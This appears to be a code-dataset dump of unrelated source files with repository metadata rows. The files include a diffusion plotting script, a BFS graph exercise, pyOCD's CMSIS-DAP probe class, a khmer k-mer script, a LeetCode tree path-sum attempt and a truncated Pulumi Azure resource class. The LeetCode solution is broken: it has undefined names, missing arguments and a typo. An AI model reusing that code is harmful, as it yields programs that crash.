ax3.plot(xVals, yVals,
lw = 0.75,
alpha = 1.0,
color = '#666666',
zorder = 1,
label = r'MSD$(t) = D\left(1-e^{-2t}\right)$')
leg = ax3.legend(bbox_to_anchor = [-0.03, 1.02],
loc = 'upper left',
handlelength = 1.5,
fontsize = 4.0,
scatterpoints = 1,
markerscale = 1.0,
ncol = 1)
leg.draw_frame(False)
ax3.set_xlabel(r'time $t$', fontsize = 4.0)
ax3.set_ylabel(r'MSD$(t)$', fontsize = 4.0)
ax3.xaxis.labelpad = 1.0
ax3.yaxis.labelpad = 1.5
ax3.set_xlim(0.0, 11.5)
ax3.set_ylim(0.0, 1.35)
ax3.grid(color = 'gray', alpha = 0.25, lw = 0.35, linestyle = 'dashed', dashes = [4.0, 3.0])
######################################################################################
# save to file
if (datestamp):
outname += '_' + now
if (savePDF):
f.savefig(os.path.join(outdir, outname) + '.pdf', dpi = 300, transparent = False)
if (savePNG):
f.savefig(os.path.join(outdir, outname) + '.png', dpi = 600, transparent = False)
plt.clf()
plt.close()
return None
def FPE_drift(x, x0, t):
return np.exp(-(x-x0 * np.exp(-t)) ** 2 / (2.0 * (1.0 - np.exp(-2.0 * t)))) /\
np.sqrt(2.0 * np.pi * (1.0 - np.exp(- 2.0 * t)))
if __name__ == '__main__':
filename = '03_harmonicDiffusion_m_10000_dt_1e-03.txt'
outname = filename.split('.')[0]
X = np.genfromtxt(os.path.join(RAWDIR, filename))
print X.shape
x0Value = 2.0
sampleTimes = [0.5, 1.0, 3.0, 5.0, 10.0]
firstMoments, MSD = getMoments(X, sampleTimes)
print firstMoments
print MSD
Plot(titlestr = '',
X = X,
MSD = MSD,
outname = outname,
outdir = OUTDIR,
grid = False)
| [
"[email protected]"
] | |
c9bc8a15f2a2ae16fac4e0306ec4fcea3554ba9f | cfa35020cd963c013583a6bb1c862fa9884f2bf4 | /Algorithm/SWEA/D2/5102_d2_노드의거리.py | cb148321280b3370741cf95b6f7e552d7fd1bf8e | [] | no_license | LeeSungRyul/TIL | c16b4ef35be3226a6f9aedcc4b7c457d10de781a | 0c085e654d4e72c84c9aa10ceca4a54b834a4c63 | refs/heads/master | 2023-08-21T11:09:49.575813 | 2021-10-15T14:02:36 | 2021-10-15T14:02:36 | 335,647,426 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,210 | py | from collections import deque
T = int(input())
def bfs(start):
queue = deque()
queue.append(start)
visited[start] = 1
while queue:
cur = queue.popleft()
for nxt in G[cur]: # 인접 리스트 접근
if nxt == end:
return visited[cur] # 시작점을 1로 두고 계산했으므로 nxt까지의 거리에서 1을 뺀 cur 좌표까지의 거리 return
if not visited[nxt]:
visited[nxt] = visited[cur] + 1
queue.append(nxt)
return 0 # while 다 돈 경우, 목적지에 도착할 수 없으므로 return 0
for tc in range(1, T + 1):
V, E = map(int, input().split())
# G = [[] for _ in range(V+1)] # 인접 리스트
# for _ in range(E):
# node1, node2 = map(int, input().split())
# G[node1].append(node2)
# G[node2].append(node1)
G = {i: [] for i in range(V + 1)} # 인접 딕셔너리
for _ in range(E):
node1, node2 = map(int, input().split())
G[node1].append(node2)
G[node2].append(node1)
start, end = map(int, input().split())
visited = [0 for _ in range(V + 1)]
print("#{} {}".format(tc, bfs(start)))
| [
"[email protected]"
] | |
5ddb305889d68d304ff09e2f3d620e3971d7277f | 4943edd96703a0c993ce41854093ea0fc9da9f63 | /pyocd/probe/cmsis_dap_probe.py | fb6a5ac899ea018693edacd527f930ad23ae6540 | [
"Apache-2.0"
] | permissive | wellsleep/pyOCD | f3048cda2b9b17fa9d804167fc792261df6a2d95 | a2e89c9364bad99b2b0b65bfaf6bc137be8aa901 | refs/heads/master | 2020-05-15T02:52:18.231996 | 2019-04-17T22:24:54 | 2019-04-17T22:24:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,362 | py | # pyOCD debugger
# Copyright (c) 2018 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .debug_probe import DebugProbe
from ..core import exceptions
from .pydapaccess import DAPAccess
from ..board.mbed_board import MbedBoard
from ..board.board_ids import BOARD_ID_TO_INFO
import six
## @brief Wraps a pydapaccess link as a DebugProbe.
class CMSISDAPProbe(DebugProbe):
# Masks for CMSIS-DAP capabilities.
SWD_CAPABILITY_MASK = 1
JTAG_CAPABILITY_MASK = 2
# Map from DebugProbe protocol types to/from DAPAccess port types.
PORT_MAP = {
DebugProbe.Protocol.DEFAULT: DAPAccess.PORT.DEFAULT,
DebugProbe.Protocol.SWD: DAPAccess.PORT.SWD,
DebugProbe.Protocol.JTAG: DAPAccess.PORT.JTAG,
DAPAccess.PORT.DEFAULT: DebugProbe.Protocol.DEFAULT,
DAPAccess.PORT.SWD: DebugProbe.Protocol.SWD,
DAPAccess.PORT.JTAG: DebugProbe.Protocol.JTAG,
}
# APnDP constants.
DP = 0
AP = 1
# Bitmasks for AP register address fields.
A32 = 0x0000000c
APBANKSEL = 0x000000f0
APSEL = 0xff000000
APSEL_APBANKSEL = APSEL | APBANKSEL
# Address of DP's SELECT register.
DP_SELECT = 0x8
# Map from AP/DP and 2-bit register address to the enums used by pydapaccess.
REG_ADDR_TO_ID_MAP = {
# APnDP A32
( 0, 0x0 ) : DAPAccess.REG.DP_0x0,
( 0, 0x4 ) : DAPAccess.REG.DP_0x4,
( 0, 0x8 ) : DAPAccess.REG.DP_0x8,
( 0, 0xC ) : DAPAccess.REG.DP_0xC,
( 1, 0x0 ) : DAPAccess.REG.AP_0x0,
( 1, 0x4 ) : DAPAccess.REG.AP_0x4,
( 1, 0x8 ) : DAPAccess.REG.AP_0x8,
( 1, 0xC ) : DAPAccess.REG.AP_0xC,
}
## USB VID and PID pair for DAPLink firmware.
DAPLINK_VIDPID = (0x0d28, 0x0204)
@classmethod
def get_all_connected_probes(cls):
try:
return [cls(dev) for dev in DAPAccess.get_connected_devices()]
except DAPAccess.Error as exc:
six.raise_from(cls._convert_exception(exc), exc)
@classmethod
def get_probe_with_id(cls, unique_id):
try:
return cls(DAPAccess(unique_id))
except DAPAccess.Error as exc:
six.raise_from(cls._convert_exception(exc), exc)
def __init__(self, device):
self._link = device
self._supported_protocols = None
self._protocol = None
self._is_open = False
self._dp_select = -1
@property
def description(self):
try:
board_id = self.unique_id[0:4]
board_info = BOARD_ID_TO_INFO[board_id]
except KeyError:
return self.vendor_name + " " + self.product_name
else:
return "{0} [{1}]".format(board_info.name, board_info.target)
@property
def vendor_name(self):
return self._link.vendor_name
@property
def product_name(self):
return self._link.product_name
## @brief Only valid after opening.
@property
def supported_wire_protocols(self):
return self._supported_protocols
@property
def unique_id(self):
return self._link.get_unique_id()
@property
def wire_protocol(self):
return self._protocol
@property
def is_open(self):
return self._is_open
def create_associated_board(self, session):
# Only support associated Mbed boards for DAPLink firmware. We can't assume other
# CMSIS-DAP firmware is using the same serial number format, so we cannot reliably
# extract the board ID.
if self._link.vidpid == self.DAPLINK_VIDPID:
return MbedBoard(session)
else:
return None
def open(self):
try:
self._link.open()
self._is_open = True
self._link.set_deferred_transfer(True)
# Read CMSIS-DAP capabilities
self._capabilities = self._link.identify(DAPAccess.ID.CAPABILITIES)
self._supported_protocols = [DebugProbe.Protocol.DEFAULT]
if self._capabilities & self.SWD_CAPABILITY_MASK:
self._supported_protocols.append(DebugProbe.Protocol.SWD)
if self._capabilities & self.JTAG_CAPABILITY_MASK:
self._supported_protocols.append(DebugProbe.Protocol.JTAG)
except DAPAccess.Error as exc:
six.raise_from(self._convert_exception(exc), exc)
def close(self):
try:
self._link.close()
self._is_open = False
except DAPAccess.Error as exc:
six.raise_from(self._convert_exception(exc), exc)
# ------------------------------------------- #
# Target control functions
# ------------------------------------------- #
def connect(self, protocol=None):
"""Initialize DAP IO pins for JTAG or SWD"""
# Convert protocol to port enum.
if protocol is not None:
port = self.PORT_MAP[protocol]
else:
port = DAPAccess.PORT.DEFAULT
try:
self._link.connect(port)
except DAPAccess.Error as exc:
six.raise_from(self._convert_exception(exc), exc)
# Read the current mode and save it.
actualMode = self._link.get_swj_mode()
self._protocol = self.PORT_MAP[actualMode]
self._invalidate_cached_registers()
# TODO remove
def swj_sequence(self):
"""Send sequence to activate JTAG or SWD on the target"""
try:
self._link.swj_sequence()
except DAPAccess.Error as exc:
six.raise_from(self._convert_exception(exc), exc)
def disconnect(self):
"""Deinitialize the DAP I/O pins"""
try:
self._link.disconnect()
self._protocol = None
self._invalidate_cached_registers()
except DAPAccess.Error as exc:
six.raise_from(self._convert_exception(exc), exc)
def set_clock(self, frequency):
"""Set the frequency for JTAG and SWD in Hz
This function is safe to call before connect is called.
"""
try:
self._link.set_clock(frequency)
except DAPAccess.Error as exc:
six.raise_from(self._convert_exception(exc), exc)
def reset(self):
"""Reset the target"""
try:
self._invalidate_cached_registers()
self._link.reset()
except DAPAccess.Error as exc:
six.raise_from(self._convert_exception(exc), exc)
def assert_reset(self, asserted):
"""Assert or de-assert target reset line"""
try:
self._invalidate_cached_registers()
self._link.assert_reset(asserted)
except DAPAccess.Error as exc:
six.raise_from(self._convert_exception(exc), exc)
def is_reset_asserted(self):
"""Returns True if the target reset line is asserted or False if de-asserted"""
try:
return self._link.is_reset_asserted()
except DAPAccess.Error as exc:
six.raise_from(self._convert_exception(exc), exc)
def flush(self):
"""Write out all unsent commands"""
try:
self._link.flush()
except DAPAccess.Error as exc:
six.raise_from(self._convert_exception(exc), exc)
# ------------------------------------------- #
# DAP Access functions
# ------------------------------------------- #
## @brief Read a DP register.
#
# @param self
# @param addr Integer register address being one of (0x0, 0x4, 0x8, 0xC).
# @param now
#
# @todo Handle auto DPBANKSEL.
def read_dp(self, addr, now=True):
reg_id = self.REG_ADDR_TO_ID_MAP[self.DP, addr]
try:
result = self._link.read_reg(reg_id, now=now)
except DAPAccess.Error as error:
self._invalidate_cached_registers()
six.raise_from(self._convert_exception(error), error)
# Read callback returned for async reads.
def read_dp_result_callback():
try:
return result()
except DAPAccess.Error as error:
self._invalidate_cached_registers()
six.raise_from(self._convert_exception(error), error)
return result if now else read_dp_result_callback
def write_dp(self, addr, data):
reg_id = self.REG_ADDR_TO_ID_MAP[self.DP, addr]
# Skip writing DP SELECT register if its value is not changing.
if addr == self.DP_SELECT:
if data == self._dp_select:
return
self._dp_select = data
# Write the DP register.
try:
self._link.write_reg(reg_id, data)
except DAPAccess.Error as error:
self._invalidate_cached_registers()
six.raise_from(self._convert_exception(error), error)
return True
def read_ap(self, addr, now=True):
assert type(addr) in (six.integer_types)
ap_reg = self.REG_ADDR_TO_ID_MAP[self.AP, (addr & self.A32)]
try:
self.write_dp(self.DP_SELECT, addr & self.APSEL_APBANKSEL)
result = self._link.read_reg(ap_reg, now=now)
except DAPAccess.Error as error:
self._invalidate_cached_registers()
six.raise_from(self._convert_exception(error), error)
# Read callback returned for async reads.
def read_ap_result_callback():
try:
return result()
except DAPAccess.Error as error:
self._invalidate_cached_registers()
six.raise_from(self._convert_exception(error), error)
return result if now else read_ap_result_callback
def write_ap(self, addr, data):
assert type(addr) in (six.integer_types)
ap_reg = self.REG_ADDR_TO_ID_MAP[self.AP, (addr & self.A32)]
# Select the AP and bank.
self.write_dp(self.DP_SELECT, addr & self.APSEL_APBANKSEL)
# Perform the AP register write.
try:
self._link.write_reg(ap_reg, data)
except DAPAccess.Error as error:
self._invalidate_cached_registers()
six.raise_from(self._convert_exception(error), error)
return True
def read_ap_multiple(self, addr, count=1, now=True):
assert type(addr) in (six.integer_types)
ap_reg = self.REG_ADDR_TO_ID_MAP[self.AP, (addr & self.A32)]
try:
# Select the AP and bank.
self.write_dp(self.DP_SELECT, addr & self.APSEL_APBANKSEL)
result = self._link.reg_read_repeat(count, ap_reg, dap_index=0, now=now)
except DAPAccess.Error as exc:
self._invalidate_cached_registers()
six.raise_from(self._convert_exception(exc), exc)
# Need to wrap the deferred callback to convert exceptions.
def read_ap_repeat_callback():
try:
return result()
except DAPAccess.Error as exc:
self._invalidate_cached_registers()
six.raise_from(self._convert_exception(exc), exc)
return result if now else read_ap_repeat_callback
def write_ap_multiple(self, addr, values):
assert type(addr) in (six.integer_types)
ap_reg = self.REG_ADDR_TO_ID_MAP[self.AP, (addr & self.A32)]
try:
# Select the AP and bank.
self.write_dp(self.DP_SELECT, addr & self.APSEL_APBANKSEL)
return self._link.reg_write_repeat(len(values), ap_reg, values, dap_index=0)
except DAPAccess.Error as exc:
self._invalidate_cached_registers()
six.raise_from(self._convert_exception(exc), exc)
# ------------------------------------------- #
# SWO functions
# ------------------------------------------- #
def has_swo(self):
"""! @brief Returns bool indicating whether the link supports SWO."""
try:
return self._link.has_swo()
except DAPAccess.Error as exc:
six.raise_from(self._convert_exception(exc), exc)
def swo_start(self, baudrate):
"""! @brief Start receiving SWO data at the given baudrate."""
try:
self._link.swo_configure(True, baudrate)
self._link.swo_control(True)
except DAPAccess.Error as exc:
six.raise_from(self._convert_exception(exc), exc)
def swo_stop(self):
"""! @brief Stop receiving SWO data."""
try:
self._link.swo_configure(False, 0)
except DAPAccess.Error as exc:
six.raise_from(self._convert_exception(exc), exc)
def swo_read(self):
"""! @brief Read buffered SWO data from the target.
@eturn Bytearray of the received data.
"""
try:
return self._link.swo_read()
except DAPAccess.Error as exc:
six.raise_from(self._convert_exception(exc), exc)
def _invalidate_cached_registers(self):
# Invalidate cached DP SELECT register.
self._dp_select = -1
@staticmethod
def _convert_exception(exc):
if isinstance(exc, DAPAccess.TransferFaultError):
return exceptions.TransferFaultError()
elif isinstance(exc, DAPAccess.TransferTimeoutError):
return exceptions.TransferTimeoutError()
elif isinstance(exc, DAPAccess.TransferError):
return exceptions.TransferError()
elif isinstance(exc, (DAPAccess.DeviceError, DAPAccess.CommandError)):
return exceptions.ProbeError(str(exc))
elif isinstance(exc, DAPAccess.Error):
return exceptions.PyOCDError(str(exc))
else:
return exc
| [
"[email protected]"
] | |
345fd054c1b316d116d5b930809e3288f775f9f4 | 6bb91e13994476f58db50374972825650cfaa0b9 | /count-median-norm.py | 798a733ade9ed282759117466c1cb4ec3a695154 | [] | no_license | ctb/2015-khmer-wok3-counting | cdf4d15137b1a214619cfaf9b00bc0b6752c28de | 99819ed152bf0f23db9797fd4b79bd6eb9bfc9eb | refs/heads/master | 2021-01-16T18:57:07.013341 | 2015-05-20T11:22:06 | 2015-05-20T11:22:06 | 34,345,558 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,966 | py | #! /usr/bin/env python2
#
# This file is part of khmer, https://github.com/dib-lab/khmer/, and is
# Copyright (C) Michigan State University, 2009-2015. It is licensed under
# the three-clause BSD license; see LICENSE.
# Contact: [email protected]
#
# pylint: disable=missing-docstring,invalid-name
"""
Adapted from count-median.py in khmer 1.4
"""
import screed
import argparse
import sys
import csv
import textwrap
import khmer
from khmer.kfile import check_input_files, check_space
from khmer.khmer_args import info
def kmers(seq, K):
for pos in range(0, len(seq) - K + 1):
yield seq[pos:pos+K]
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument('ct_reads')
parser.add_argument('ct_exon')
parser.add_argument('transcripts')
return parser
def main():
args = get_parser().parse_args()
# reads counting table
ct_reads = khmer.load_counting_hash(args.ct_reads)
# transcripts counting table
ct_exon = khmer.load_counting_hash(args.ct_exon)
# transcripts themselves
transcripts = args.transcripts
K = ct_reads.ksize()
assert ct_exon.ksize() == K
# build a read aligner against, well, the reads:
aligner = khmer.ReadAligner(ct_reads, 1, 1.0)
# run through the transcripts.
for record in screed.open(transcripts):
counts = [] # not norm by exon count
counts2 = [] # norm by exon count
counts3 = [] # aligned & norm by exon count
seq = record.sequence.replace('N', 'A')
x, y, z = ct_reads.get_median_count(seq)
if x == 0: # skip
continue
# first, do straight k-mer distribution
for kmer in kmers(seq, K):
exon_count = ct_exon.get(kmer)
if exon_count:
count = ct_reads.get(kmer)
counts.append(count)
counts2.append(count / float(exon_count))
# next, do aligned k-mer distribution, normalized
score, alignment, _, trunc = aligner.align(seq)
alignment = alignment.replace('-', '')
for pos in range(len(alignment) - K + 1):
kmer = alignment[pos:pos + K]
exon_count = ct_exon.get(kmer)
if exon_count:
count = ct_reads.get(kmer)
counts3.append(count / float(exon_count))
# calculate summaries
avg = sum(counts) / float(len(counts))
avg2 = sum(counts2) / float(len(counts))
avg3 = 0.0
if counts3:
avg3 = sum(counts3) / float(len(counts3))
# check to see if the alignment was truncated; set to numerical
if trunc:
trunc = 1
else:
trunc = 0
# output!
print record.name, avg, avg2, avg3, trunc, len(seq), len(alignment)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
79320e597beddc47d9f979c2d5bdc56d00f58d5b | 02425f5fffe5f46961c3167c46302ef84c6e48a4 | /binary_tree_maximum_path_sum/main.py | 4af5b69418f0f6d82ee0138bb1528cb0b323b288 | [] | no_license | tingleshao/leetcode | 583718b5e58c3611f3db352d82017ba1d4482f18 | e2c589a1e81282e1c3deb6dfc5cace595acb841b | refs/heads/master | 2021-01-23T03:43:31.256959 | 2015-01-23T18:00:25 | 2015-01-23T18:00:25 | 29,308,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,164 | py | # Definition for a binary tree node
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
# @param root, a tree node
# @return an integer
def maxPathSum(self, root):
if root == None:
return 0
mx = [root.val]
self.recNodes(root, mx)
return mx[0]
def recNodes(self, node, mx):
numl = 0
numr = 0
if node.left != None:
numl = self.recNodes(node.left)
if node.right != None:
numr = self.recNodes(node.right)
value = node.val
sumWhole = self.checkMax(value, numl+numr, mx)
if numl > 0:
sumLeft = checkmax(value,numl, mx)
else:
sumLeft = value
if numlr> 0:
sumRight = checkmax(value,numr, mx)
else:
sumRight = value
return max(sumLeft,sumRight), mx
def checkMax(self, val, sm, mx):
if sm > 0:
sm += val
else:
sm = val
if sm > mx[0]:
mx[0] = sm
return sm
def main():
s = Solution()
if __name__ == "__main__":
main() | [
"[email protected]"
] | |
82377da9c55bcfaf2f676c70a0fe611dc39bc9d9 | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/desktopvirtualization/v20201110preview/application_group.py | ac3871b2e01bacad414c5e2f5bbedb62ccd3a7bf | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 16,883 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ._enums import *
__all__ = ['ApplicationGroupArgs', 'ApplicationGroup']
@pulumi.input_type
class ApplicationGroupArgs:
def __init__(__self__, *,
application_group_type: pulumi.Input[Union[str, 'ApplicationGroupType']],
host_pool_arm_path: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
application_group_name: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
friendly_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a ApplicationGroup resource.
:param pulumi.Input[Union[str, 'ApplicationGroupType']] application_group_type: Resource Type of ApplicationGroup.
:param pulumi.Input[str] host_pool_arm_path: HostPool arm path of ApplicationGroup.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] application_group_name: The name of the application group
:param pulumi.Input[str] description: Description of ApplicationGroup.
:param pulumi.Input[str] friendly_name: Friendly name of ApplicationGroup.
:param pulumi.Input[str] location: The geo-location where the resource lives
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
"""
pulumi.set(__self__, "application_group_type", application_group_type)
pulumi.set(__self__, "host_pool_arm_path", host_pool_arm_path)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if application_group_name is not None:
pulumi.set(__self__, "application_group_name", application_group_name)
if description is not None:
pulumi.set(__self__, "description", description)
if friendly_name is not None:
pulumi.set(__self__, "friendly_name", friendly_name)
if location is not None:
pulumi.set(__self__, "location", location)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="applicationGroupType")
def application_group_type(self) -> pulumi.Input[Union[str, 'ApplicationGroupType']]:
"""
Resource Type of ApplicationGroup.
"""
return pulumi.get(self, "application_group_type")
@application_group_type.setter
def application_group_type(self, value: pulumi.Input[Union[str, 'ApplicationGroupType']]):
pulumi.set(self, "application_group_type", value)
@property
@pulumi.getter(name="hostPoolArmPath")
def host_pool_arm_path(self) -> pulumi.Input[str]:
"""
HostPool arm path of ApplicationGroup.
"""
return pulumi.get(self, "host_pool_arm_path")
@host_pool_arm_path.setter
def host_pool_arm_path(self, value: pulumi.Input[str]):
pulumi.set(self, "host_pool_arm_path", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="applicationGroupName")
def application_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the application group
"""
return pulumi.get(self, "application_group_name")
@application_group_name.setter
def application_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "application_group_name", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of ApplicationGroup.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="friendlyName")
def friendly_name(self) -> Optional[pulumi.Input[str]]:
"""
Friendly name of ApplicationGroup.
"""
return pulumi.get(self, "friendly_name")
@friendly_name.setter
def friendly_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "friendly_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class ApplicationGroup(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
application_group_name: Optional[pulumi.Input[str]] = None,
application_group_type: Optional[pulumi.Input[Union[str, 'ApplicationGroupType']]] = None,
description: Optional[pulumi.Input[str]] = None,
friendly_name: Optional[pulumi.Input[str]] = None,
host_pool_arm_path: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Represents a ApplicationGroup definition.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] application_group_name: The name of the application group
:param pulumi.Input[Union[str, 'ApplicationGroupType']] application_group_type: Resource Type of ApplicationGroup.
:param pulumi.Input[str] description: Description of ApplicationGroup.
:param pulumi.Input[str] friendly_name: Friendly name of ApplicationGroup.
:param pulumi.Input[str] host_pool_arm_path: HostPool arm path of ApplicationGroup.
:param pulumi.Input[str] location: The geo-location where the resource lives
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ApplicationGroupArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Represents a ApplicationGroup definition.
:param str resource_name: The name of the resource.
:param ApplicationGroupArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ApplicationGroupArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
application_group_name: Optional[pulumi.Input[str]] = None,
application_group_type: Optional[pulumi.Input[Union[str, 'ApplicationGroupType']]] = None,
description: Optional[pulumi.Input[str]] = None,
friendly_name: Optional[pulumi.Input[str]] = None,
host_pool_arm_path: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ApplicationGroupArgs.__new__(ApplicationGroupArgs)
__props__.__dict__["application_group_name"] = application_group_name
if application_group_type is None and not opts.urn:
raise TypeError("Missing required property 'application_group_type'")
__props__.__dict__["application_group_type"] = application_group_type
__props__.__dict__["description"] = description
__props__.__dict__["friendly_name"] = friendly_name
if host_pool_arm_path is None and not opts.urn:
raise TypeError("Missing required property 'host_pool_arm_path'")
__props__.__dict__["host_pool_arm_path"] = host_pool_arm_path
__props__.__dict__["location"] = location
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
__props__.__dict__["name"] = None
__props__.__dict__["type"] = None
__props__.__dict__["workspace_arm_path"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20201110preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20190123preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20190123preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20190924preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20190924preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20191210preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20191210preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20200921preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20200921preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20201019preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20201019preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20201102preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20201102preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210114preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210114preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210201preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210201preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210309preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210309preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210401preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210401preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210513preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210513preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210712:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210712:ApplicationGroup")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(ApplicationGroup, __self__).__init__(
'azure-native:desktopvirtualization/v20201110preview:ApplicationGroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'ApplicationGroup':
"""
Get an existing ApplicationGroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
